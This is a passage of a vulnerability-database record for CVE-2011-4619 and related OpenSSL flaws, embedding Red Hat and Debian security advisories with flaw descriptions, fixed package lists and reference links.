applications and configuration\nfiles). \n\nAll users of JBoss Enterprise Web Server 1.0.2 for Solaris and Microsoft\nWindows as provided from the Red Hat Customer Portal are advised to apply\nthis update. Solution:\n\nThe References section of this erratum contains a download link (you must\nlog in to download the update). Before applying the update, back up your\nexisting JBoss Enterprise Web Server installation (including all\napplications and configuration files). -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\n=====================================================================\n Red Hat Security Advisory\n\nSynopsis: Moderate: openssl security update\nAdvisory ID: RHSA-2012:0059-01\nProduct: Red Hat Enterprise Linux\nAdvisory URL: https://rhn.redhat.com/errata/RHSA-2012-0059.html\nIssue date: 2012-01-24\nCVE Names: CVE-2011-4108 CVE-2011-4576 CVE-2011-4577 \n CVE-2011-4619 \n=====================================================================\n\n1. Summary:\n\nUpdated openssl packages that fix multiple security issues are now\navailable for Red Hat Enterprise Linux 6. \n\nThe Red Hat Security Response Team has rated this update as having moderate\nsecurity impact. Common Vulnerability Scoring System (CVSS) base scores,\nwhich give detailed severity ratings, are available for each vulnerability\nfrom the CVE links in the References section. \n\n2. Relevant releases/architectures:\n\nRed Hat Enterprise Linux Desktop (v. 6) - i386, x86_64\nRed Hat Enterprise Linux Desktop Optional (v. 6) - i386, x86_64\nRed Hat Enterprise Linux HPC Node (v. 6) - x86_64\nRed Hat Enterprise Linux HPC Node Optional (v. 6) - x86_64\nRed Hat Enterprise Linux Server (v. 6) - i386, ppc64, s390x, x86_64\nRed Hat Enterprise Linux Server Optional (v. 6) - i386, ppc64, s390x, x86_64\nRed Hat Enterprise Linux Workstation (v. 6) - i386, x86_64\nRed Hat Enterprise Linux Workstation Optional (v. 6) - i386, x86_64\n\n3. Description:\n\nOpenSSL is a toolkit that implements the Secure Sockets Layer (SSL v2/v3)\nand Transport Layer Security (TLS v1) protocols, as well as a\nfull-strength, general purpose cryptography library. \n\nIt was discovered that the Datagram Transport Layer Security (DTLS)\nprotocol implementation in OpenSSL leaked timing information when\nperforming certain operations. A remote attacker could possibly use this\nflaw to retrieve plain text from the encrypted packets by using a DTLS\nserver as a padding oracle. (CVE-2011-4108)\n\nAn information leak flaw was found in the SSL 3.0 protocol implementation\nin OpenSSL. Incorrect initialization of SSL record padding bytes could\ncause an SSL client or server to send a limited amount of possibly\nsensitive data to its SSL peer via the encrypted connection. \n(CVE-2011-4576)\n\nA denial of service flaw was found in the RFC 3779 implementation in\nOpenSSL. A remote attacker could use this flaw to make an application using\nOpenSSL exit unexpectedly by providing a specially-crafted X.509\ncertificate that has malformed RFC 3779 extension data. \n(CVE-2011-4619)\n\nAll OpenSSL users should upgrade to these updated packages, which contain\nbackported patches to resolve these issues. For the update to take effect,\nall services linked to the OpenSSL library must be restarted, or the system\nrebooted. \n\n4. Solution:\n\nBefore applying this update, make sure all previously-released errata\nrelevant to your system have been applied. \n\nThis update is available via the Red Hat Network. Details on how to\nuse the Red Hat Network to apply this update are available at\nhttps://access.redhat.com/kb/docs/DOC-11259\n\n5. Bugs fixed (http://bugzilla.redhat.com/):\n\n771770 - CVE-2011-4108 openssl: DTLS plaintext recovery attack\n771775 - CVE-2011-4576 openssl: uninitialized SSL 3.0 padding\n771778 - CVE-2011-4577 openssl: malformed RFC 3779 data can cause assertion failures\n771780 - CVE-2011-4619 openssl: SGC restart DoS attack\n\n6. Package List:\n\nRed Hat Enterprise Linux Desktop (v. 6):\n\nSource:\nftp://ftp.redhat.com/pub/redhat/linux/enterprise/6Client/en/os/SRPMS/openssl-1.0.0-20.el6_2.1.src.rpm\n\ni386:\nopenssl-1.0.0-20.el6_2.1.i686.rpm\nopenssl-debuginfo-1.0.0-20.el6_2.1.i686.rpm\n\nx86_64:\nopenssl-1.0.0-20.el6_2.1.i686.rpm\nopenssl-1.0.0-20.el6_2.1.x86_64.rpm\nopenssl-debuginfo-1.0.0-20.el6_2.1.i686.rpm\nopenssl-debuginfo-1.0.0-20.el6_2.1.x86_64.rpm\n\nRed Hat Enterprise Linux Desktop Optional (v. 6):\n\nSource:\nftp://ftp.redhat.com/pub/redhat/linux/enterprise/6Client/en/os/SRPMS/openssl-1.0.0-20.el6_2.1.src.rpm\n\ni386:\nopenssl-debuginfo-1.0.0-20.el6_2.1.i686.rpm\nopenssl-devel-1.0.0-20.el6_2.1.i686.rpm\nopenssl-perl-1.0.0-20.el6_2.1.i686.rpm\nopenssl-static-1.0.0-20.el6_2.1.i686.rpm\n\nx86_64:\nopenssl-debuginfo-1.0.0-20.el6_2.1.i686.rpm\nopenssl-debuginfo-1.0.0-20.el6_2.1.x86_64.rpm\nopenssl-devel-1.0.0-20.el6_2.1.i686.rpm\nopenssl-devel-1.0.0-20.el6_2.1.x86_64.rpm\nopenssl-perl-1.0.0-20.el6_2.1.x86_64.rpm\nopenssl-static-1.0.0-20.el6_2.1.x86_64.rpm\n\nRed Hat Enterprise Linux HPC Node (v. 6):\n\nSource:\nftp://ftp.redhat.com/pub/redhat/linux/enterprise/6ComputeNode/en/os/SRPMS/openssl-1.0.0-20.el6_2.1.src.rpm\n\nx86_64:\nopenssl-1.0.0-20.el6_2.1.i686.rpm\nopenssl-1.0.0-20.el6_2.1.x86_64.rpm\nopenssl-debuginfo-1.0.0-20.el6_2.1.i686.rpm\nopenssl-debuginfo-1.0.0-20.el6_2.1.x86_64.rpm\n\nRed Hat Enterprise Linux HPC Node Optional (v. 6):\n\nSource:\nftp://ftp.redhat.com/pub/redhat/linux/enterprise/6ComputeNode/en/os/SRPMS/openssl-1.0.0-20.el6_2.1.src.rpm\n\nx86_64:\nopenssl-debuginfo-1.0.0-20.el6_2.1.i686.rpm\nopenssl-debuginfo-1.0.0-20.el6_2.1.x86_64.rpm\nopenssl-devel-1.0.0-20.el6_2.1.i686.rpm\nopenssl-devel-1.0.0-20.el6_2.1.x86_64.rpm\nopenssl-perl-1.0.0-20.el6_2.1.x86_64.rpm\nopenssl-static-1.0.0-20.el6_2.1.x86_64.rpm\n\nRed Hat Enterprise Linux Server (v. 6):\n\nSource:\nftp://ftp.redhat.com/pub/redhat/linux/enterprise/6Server/en/os/SRPMS/openssl-1.0.0-20.el6_2.1.src.rpm\n\ni386:\nopenssl-1.0.0-20.el6_2.1.i686.rpm\nopenssl-debuginfo-1.0.0-20.el6_2.1.i686.rpm\nopenssl-devel-1.0.0-20.el6_2.1.i686.rpm\n\nppc64:\nopenssl-1.0.0-20.el6_2.1.ppc.rpm\nopenssl-1.0.0-20.el6_2.1.ppc64.rpm\nopenssl-debuginfo-1.0.0-20.el6_2.1.ppc.rpm\nopenssl-debuginfo-1.0.0-20.el6_2.1.ppc64.rpm\nopenssl-devel-1.0.0-20.el6_2.1.ppc.rpm\nopenssl-devel-1.0.0-20.el6_2.1.ppc64.rpm\n\ns390x:\nopenssl-1.0.0-20.el6_2.1.s390.rpm\nopenssl-1.0.0-20.el6_2.1.s390x.rpm\nopenssl-debuginfo-1.0.0-20.el6_2.1.s390.rpm\nopenssl-debuginfo-1.0.0-20.el6_2.1.s390x.rpm\nopenssl-devel-1.0.0-20.el6_2.1.s390.rpm\nopenssl-devel-1.0.0-20.el6_2.1.s390x.rpm\n\nx86_64:\nopenssl-1.0.0-20.el6_2.1.i686.rpm\nopenssl-1.0.0-20.el6_2.1.x86_64.rpm\nopenssl-debuginfo-1.0.0-20.el6_2.1.i686.rpm\nopenssl-debuginfo-1.0.0-20.el6_2.1.x86_64.rpm\nopenssl-devel-1.0.0-20.el6_2.1.i686.rpm\nopenssl-devel-1.0.0-20.el6_2.1.x86_64.rpm\n\nRed Hat Enterprise Linux Server Optional (v. 6):\n\nSource:\nftp://ftp.redhat.com/pub/redhat/linux/enterprise/6Server/en/os/SRPMS/openssl-1.0.0-20.el6_2.1.src.rpm\n\ni386:\nopenssl-debuginfo-1.0.0-20.el6_2.1.i686.rpm\nopenssl-perl-1.0.0-20.el6_2.1.i686.rpm\nopenssl-static-1.0.0-20.el6_2.1.i686.rpm\n\nppc64:\nopenssl-debuginfo-1.0.0-20.el6_2.1.ppc64.rpm\nopenssl-perl-1.0.0-20.el6_2.1.ppc64.rpm\nopenssl-static-1.0.0-20.el6_2.1.ppc64.rpm\n\ns390x:\nopenssl-debuginfo-1.0.0-20.el6_2.1.s390x.rpm\nopenssl-perl-1.0.0-20.el6_2.1.s390x.rpm\nopenssl-static-1.0.0-20.el6_2.1.s390x.rpm\n\nx86_64:\nopenssl-debuginfo-1.0.0-20.el6_2.1.x86_64.rpm\nopenssl-perl-1.0.0-20.el6_2.1.x86_64.rpm\nopenssl-static-1.0.0-20.el6_2.1.x86_64.rpm\n\nRed Hat Enterprise Linux Workstation (v. 6):\n\nSource:\nftp://ftp.redhat.com/pub/redhat/linux/enterprise/6Workstation/en/os/SRPMS/openssl-1.0.0-20.el6_2.1.src.rpm\n\ni386:\nopenssl-1.0.0-20.el6_2.1.i686.rpm\nopenssl-debuginfo-1.0.0-20.el6_2.1.i686.rpm\nopenssl-devel-1.0.0-20.el6_2.1.i686.rpm\n\nx86_64:\nopenssl-1.0.0-20.el6_2.1.i686.rpm\nopenssl-1.0.0-20.el6_2.1.x86_64.rpm\nopenssl-debuginfo-1.0.0-20.el6_2.1.i686.rpm\nopenssl-debuginfo-1.0.0-20.el6_2.1.x86_64.rpm\nopenssl-devel-1.0.0-20.el6_2.1.i686.rpm\nopenssl-devel-1.0.0-20.el6_2.1.x86_64.rpm\n\nRed Hat Enterprise Linux Workstation Optional (v. 6):\n\nSource:\nftp://ftp.redhat.com/pub/redhat/linux/enterprise/6Workstation/en/os/SRPMS/openssl-1.0.0-20.el6_2.1.src.rpm\n\ni386:\nopenssl-debuginfo-1.0.0-20.el6_2.1.i686.rpm\nopenssl-perl-1.0.0-20.el6_2.1.i686.rpm\nopenssl-static-1.0.0-20.el6_2.1.i686.rpm\n\nx86_64:\nopenssl-debuginfo-1.0.0-20.el6_2.1.x86_64.rpm\nopenssl-perl-1.0.0-20.el6_2.1.x86_64.rpm\nopenssl-static-1.0.0-20.el6_2.1.x86_64.rpm\n\nThese packages are GPG signed by Red Hat for security. Our key and \ndetails on how to verify the signature are available from\nhttps://access.redhat.com/security/team/key/#package\n\n7. References:\n\nhttps://www.redhat.com/security/data/cve/CVE-2011-4108.html\nhttps://www.redhat.com/security/data/cve/CVE-2011-4576.html\nhttps://www.redhat.com/security/data/cve/CVE-2011-4577.html\nhttps://www.redhat.com/security/data/cve/CVE-2011-4619.html\nhttps://access.redhat.com/security/updates/classification/#moderate\n\n8. Contact:\n\nThe Red Hat security contact is \u003csecalert@redhat.com\u003e. More contact\ndetails at https://access.redhat.com/security/team/contact/\n\nCopyright 2012 Red Hat, Inc. \n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1.4.4 (GNU/Linux)\n\niD8DBQFPHySOXlSAg2UNWIIRAlYpAKCQCY5k4gZ5VKOHZekEaWFHDNjGZwCZAdR3\nCJl5iUxU4cxJLOsSBESSRVs=\n=PMiS\n-----END PGP SIGNATURE-----\n\n\n--\nRHSA-announce mailing list\nRHSA-announce@redhat.com\nhttps://www.redhat.com/mailman/listinfo/rhsa-announce\n. The Common Vulnerabilities and\nExposures project identifies the following vulnerabilities:\n\nCVE-2011-4108\n\tThe DTLS implementation performs a MAC check only if certain\n\tpadding is valid, which makes it easier for remote attackers\n\tto recover plaintext via a padding oracle attack. \n\nCVE-2011-4109 \n\tA double free vulnerability when X509_V_FLAG_POLICY_CHECK is\n\tenabled, allows remote attackers to cause applications crashes\n\tand potentially allow execution of arbitrary code by\n\ttriggering failure of a policy check. \n\nCVE-2011-4354\n\tOn 32-bit systems, the operations on NIST elliptic curves\n\tP-256 and P-384 are not correctly implemented, potentially\n\tleaking the private ECC key of a TLS server. \n\nFor the oldstable distribution (lenny), these problems have been fixed\nin version 0.9.8g-15+lenny15. \n\nFor the stable distribution (squeeze), these problems have been fixed\nin version 0.9.8o-4squeeze5. \n\nFor the testing distribution (wheezy) and the unstable distribution\n(sid), these problems have been fixed in version 1.0.0f-1. \nCharter: http://lists.grok.org.uk/full-disclosure-charter.html\nHosted and sponsored by Secunia - http://secunia.com/\n. The verification\n of md5 checksums and GPG signatures is performed automatically for you", "sources": [ { "db": "NVD", "id": "CVE-2011-4619" }, { "db": "CERT/CC", "id": "VU#737740" }, { "db": "BID", "id": "51281" }, { "db": "VULMON", "id": "CVE-2011-4619" }, { "db": "PACKETSTORM", "id": "114272" }, { "db": "PACKETSTORM", "id": "110012" }, { "db": "PACKETSTORM", "id": "110482" }, { "db": "PACKETSTORM", "id": "116825" }, { "db": "PACKETSTORM", "id": "109053" }, { "db": "PACKETSTORM", "id": "108700" }, { "db": "PACKETSTORM", "id": "113582" }, { "db": "PACKETSTORM", "id": "108735" } ], "trust": 2.7 }, "external_ids": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/external_ids#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "db": "CERT/CC", "id": "VU#737740", "trust": 2.2 }, { "db": "NVD", "id": "CVE-2011-4619", "trust": 2.2 }, { "db": "SECUNIA", "id": "48528", "trust": 1.1 }, { "db": "SECUNIA", "id": "57353", "trust": 1.1 }, { "db": "JUNIPER", "id": "JSA10659", "trust": 0.3 }, { "db": "BID", "id": "51281", "trust": 0.3 }, { "db": "VULMON", "id": "CVE-2011-4619", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "114272", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "110012", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "110482", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "116825", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "109053", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "108700", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "113582", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "108735", "trust": 0.1 } ], "sources": [ { "db": "CERT/CC", "id": "VU#737740" }, { "db": "VULMON", "id": "CVE-2011-4619" }, { "db": "BID", "id": "51281" }, { "db": "PACKETSTORM", "id": "114272" }, { "db": "PACKETSTORM", "id": "110012" }, { "db": "PACKETSTORM", "id": "110482" }, { "db": "PACKETSTORM", "id": "116825" }, { "db": "PACKETSTORM", "id": "109053" }, { "db": "PACKETSTORM", "id": "108700" }, { "db": "PACKETSTORM", "id": "113582" }, { "db": "PACKETSTORM", "id": "108735" }, { "db": "NVD", "id": "CVE-2011-4619" } ] }, "id": "VAR-201201-0314", "iot": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": true, "sources": [ { "db": "VARIoT devices database", "id": null } ], "trust": 0.44401007833333334 }, "last_update_date": "2024-07-23T19:33:28.448000Z", "patch": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/patch#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "title": "Red Hat: Moderate: openssl security update", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=rhsa-20120086 - security advisory" }, { "title": "Red Hat: Important: rhev-hypervisor6 security and bug fix update", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=rhsa-20120109 - security advisory" }, { "title": "Red Hat: Moderate: openssl security update", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=rhsa-20120060 - security advisory" }, { "title": "Red Hat: Moderate: openssl security update", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=rhsa-20120059 - security advisory" }, { "title": "Debian CVElist Bug Report Logs: CVE-2011-4354: OpenSSL 0.9.8g (32-bit builds) bug leaks ECC private keys", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=debian_cvelist_bugreportlogs\u0026qid=ea25fd33228ddfe870d0eb9177265369" }, { "title": "Debian Security Advisories: DSA-2390-1 openssl -- several vulnerabilities", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=debian_security_advisories\u0026qid=e583d2cd94d02b09eb008edba3c25e28" }, { "title": "Debian CVElist Bug Report Logs: Potential DTLS crasher bug", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=debian_cvelist_bugreportlogs\u0026qid=42b9da1ce27bbcacbdb9142890b6ad6b" }, { "title": "Amazon Linux AMI: ALAS-2012-038", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=amazon_linux_ami\u0026qid=alas-2012-038" }, { "title": "Ubuntu Security Notice: openssl vulnerabilities", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice\u0026qid=usn-1357-1" }, { "title": "", "trust": 0.1, "url": "https://github.com/hrbrmstr/internetdb " } ], "sources": [ { "db": "VULMON", "id": "CVE-2011-4619" } ] }, "problemtype_data": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "problemtype": "CWE-399", "trust": 1.0 } ], "sources": [ { "db": "NVD", "id": "CVE-2011-4619" } ] }, "references": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/references#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "trust": 1.5, "url": "http://www.openssl.org/news/secadv_20120104.txt" }, { "trust": 1.5, "url": "http://rhn.redhat.com/errata/rhsa-2012-1306.html" }, { "trust": 1.5, "url": "http://www.kb.cert.org/vuls/id/737740" }, { "trust": 1.4, "url": "http://h20000.www2.hp.com/bizsupport/techsupport/document.jsp?objectid=c03360041" }, { "trust": 1.4, "url": "http://aix.software.ibm.com/aix/efixes/security/openssl_advisory3.asc" }, { "trust": 1.4, "url": "http://rhn.redhat.com/errata/rhsa-2012-1307.html" }, { "trust": 1.4, "url": "http://rhn.redhat.com/errata/rhsa-2012-1308.html" }, { "trust": 1.4, "url": "http://support.apple.com/kb/ht5784" }, { "trust": 1.4, "url": "http://www-01.ibm.com/support/docview.wss?uid=ssg1s1004564" }, { "trust": 1.1, "url": "http://w3.efi.com/fiery" }, { "trust": 1.1, "url": "http://www.mandriva.com/security/advisories?name=mdvsa-2012:006" }, { "trust": 1.1, "url": "http://www.mandriva.com/security/advisories?name=mdvsa-2012:007" }, { "trust": 1.1, "url": "http://lists.opensuse.org/opensuse-security-announce/2012-01/msg00018.html" }, { "trust": 1.1, "url": "http://lists.opensuse.org/opensuse-security-announce/2012-01/msg00017.html" }, { "trust": 1.1, "url": "http://secunia.com/advisories/48528" }, { "trust": 1.1, "url": "http://marc.info/?l=bugtraq\u0026m=134039053214295\u0026w=2" }, { "trust": 1.1, "url": "http://marc.info/?l=bugtraq\u0026m=132750648501816\u0026w=2" }, { "trust": 1.1, "url": "http://www.debian.org/security/2012/dsa-2390" }, { "trust": 1.1, "url": "http://lists.apple.com/archives/security-announce/2013/jun/msg00000.html" }, { "trust": 1.1, "url": "http://lists.fedoraproject.org/pipermail/package-announce/2012-november/092905.html" }, { "trust": 1.1, "url": "http://secunia.com/advisories/57353" }, { "trust": 1.1, "url": "http://marc.info/?l=bugtraq\u0026m=133951357207000\u0026w=2" }, { "trust": 1.1, "url": "http://marc.info/?l=bugtraq\u0026m=133728068926468\u0026w=2" }, { "trust": 0.8, "url": "http://www.support.xerox.com/support/docucolor-242-252-260/downloads/enus.html?associatedproduct=fiery-exp260\u0026operatingsystem=win7x64" }, { "trust": 0.8, "url": "https://www.openssl.org/news/vulnerabilities.html" }, { "trust": 0.8, "url": "https://nvd.nist.gov/vuln/detail/cve-2011-4619" }, { "trust": 0.8, "url": "https://nvd.nist.gov/vuln/detail/cve-2011-4576" }, { "trust": 0.7, "url": "https://nvd.nist.gov/vuln/detail/cve-2011-4108" }, { "trust": 0.5, "url": "https://nvd.nist.gov/vuln/detail/cve-2011-4109" }, { "trust": 0.3, "url": "http://www.attachmate.com/" }, { "trust": 0.3, "url": "http://www.ibm.com/support/docview.wss?uid=isg400001530" }, { "trust": 0.3, "url": "http://www.ibm.com/support/docview.wss?uid=isg400001529" }, { "trust": 0.3, "url": "https://www-304.ibm.com/connections/blogs/psirt/entry/security_bulletin_potential_security_exposure_when_using_ibm_infosphere_streams_due_to_vulnerabilities_in_ibm_java_se_version_6_sdk6?lang=en_us" }, { "trust": 0.3, "url": "https://www14.software.ibm.com/webapp/iwm/web/prelogin.do?source=aixbp" }, { "trust": 0.3, "url": "http://www.openssl.org" }, { "trust": 0.3, "url": "http://support.avaya.com/css/p8/documents/100157565" }, { "trust": 0.3, "url": "http://blog.pfsense.org/?p=676" }, { "trust": 0.3, "url": "http://www.ibm.com/support/docview.wss?uid=swg21637929" }, { "trust": 0.3, "url": "https://www.ibm.com/connections/blogs/psirt/entry/security_bulletin_ibm_tivoli_netcool_system_service_monitors_application_service_monitors_is_affected_by_multiple_openssl_vulnerabilities?lang=en_us" }, { "trust": 0.3, "url": "http://support.attachmate.com/techdocs/1708.html" }, { "trust": 0.3, "url": "http://support.attachmate.com/techdocs/2502.html" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21631429" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21626257" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21651196" }, { "trust": 0.3, "url": "http://kb.juniper.net/infocenter/index?page=content\u0026id=jsa10659" }, { "trust": 0.3, "url": "http://support.avaya.com/css/p8/documents/100156631" }, { "trust": 0.3, "url": "http://support.avaya.com/css/p8/documents/100156392" }, { "trust": 0.3, "url": "http://support.avaya.com/css/p8/documents/100157969" }, { "trust": 0.3, "url": "https://downloads.avaya.com/css/p8/documents/100161892" }, { "trust": 0.3, "url": "https://downloads.avaya.com/css/p8/documents/100161590" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21650623" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21643698" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=nas12088ececb530423186257b410072035e" }, { "trust": 0.3, "url": "http://h20000.www2.hp.com/bizsupport/techsupport/document.jsp?objectid=c03315912" }, { "trust": 0.3, "url": "http://h20566.www2.hp.com/portal/site/hpsc/public/kb/docdisplay/?docid=emr_na-c03383940" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21638022" }, { "trust": 0.3, "url": "https://www.ibm.com/support/docview.wss?uid=swg21619837" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21631322" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=isg400001560" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg24030251" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg24033501" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=ssg1s1004323" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21643442" }, { "trust": 0.3, "url": "https://www-304.ibm.com/support/docview.wss?uid=swg21625170" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21651176" }, { "trust": 0.3, "url": "https://www-304.ibm.com/support/docview.wss?uid=swg21627934" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21633107" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21635888" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21638669" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21638670" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21643439" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21643437" }, { "trust": 0.3, "url": "http://support.f5.com/kb/en-us/solutions/public/15000/300/sol15314.html" }, { "trust": 0.3, "url": "http://support.f5.com/kb/en-us/solutions/public/15000/300/sol15388.html?ref=rss" }, { "trust": 0.3, "url": "http://support.f5.com/kb/en-us/solutions/public/15000/300/sol15389.html?ref=rss" }, { "trust": 0.3, "url": "http://support.f5.com/kb/en-us/solutions/public/15000/300/sol15395.html?ref=rss" }, { "trust": 0.3, "url": "http://support.f5.com/kb/en-us/solutions/public/15000/400/sol15460.html?ref=rss" }, { "trust": 0.3, "url": "http://support.f5.com/kb/en-us/solutions/public/15000/400/sol15461.html?ref=rss" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21643316" }, { "trust": 0.3, "url": "http://www.vmware.com/security/advisories/vmsa-2012-0013.html" }, { "trust": 0.3, "url": "https://downloads.avaya.com/css/p8/documents/100158312" }, { "trust": 0.3, "url": "https://downloads.avaya.com/css/p8/documents/100150578" }, { "trust": 0.3, "url": "https://downloads.avaya.com/css/p8/documents/100156392" }, { "trust": 0.3, "url": "https://nvd.nist.gov/vuln/detail/cve-2011-4577" }, { "trust": 0.3, "url": "https://nvd.nist.gov/vuln/detail/cve-2012-0027" }, { "trust": 0.3, "url": "https://www.redhat.com/mailman/listinfo/rhsa-announce" }, { "trust": 0.3, "url": "http://bugzilla.redhat.com/):" }, { "trust": 0.3, "url": "https://www.redhat.com/security/data/cve/cve-2011-4619.html" }, { "trust": 0.3, "url": "https://www.redhat.com/security/data/cve/cve-2011-4576.html" }, { "trust": 0.3, "url": "https://access.redhat.com/security/team/contact/" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2012-1165" }, { "trust": 0.2, "url": "http://h20566.www2.hp.com/portal/site/hpsc/public/kb/secbullarchive/" }, { "trust": 0.2, "url": "http://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins" }, { "trust": 0.2, "url": "https://h20566.www2.hp.com/portal/site/hpsc/public/kb/" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2012-0053" }, { "trust": 0.2, "url": "https://access.redhat.com/kb/docs/doc-11259" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2011-4109.html" }, { "trust": 0.2, "url": "https://access.redhat.com/security/team/key/#package" }, { "trust": 0.2, "url": "https://access.redhat.com/security/updates/classification/#important" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2012-0050" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2012-0884" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2011-4108.html" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2012-2110" }, { "trust": 0.1, "url": "https://cwe.mitre.org/data/definitions/399.html" }, { "trust": 0.1, "url": "https://access.redhat.com/errata/rhsa-2012:0086" }, { "trust": 0.1, "url": "https://nvd.nist.gov" }, { "trust": 0.1, "url": "https://usn.ubuntu.com/1357-1/" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2012-0036" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2012-2016" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2012-0057" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2011-4078" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2012-0031" }, { "trust": 0.1, "url": "http://h20566.www2.hp.com/portal/site/hpsc/template.page/public/psi/swddetail" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2011-4885" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2011-2834" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2011-4317" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2011-1944" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2012-2014" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2012-0830" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2011-4153" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2012-1823" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2012-2013" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2011-4415" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2011-3607" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2012-0021" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2012-2012" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2012-2015" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2011-3379" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2011-2821" }, { "trust": 0.1, "url": "https://rhn.redhat.com/errata/rhsa-2012-0168.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2012-0029.html" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2012-0029" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2012-0207.html" }, { "trust": 0.1, "url": "https://docs.redhat.com/docs/en-us/red_hat_enterprise_virtualization_for_servers/2.2/html/technical_notes/index.html" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2012-0207" }, { "trust": 0.1, "url": 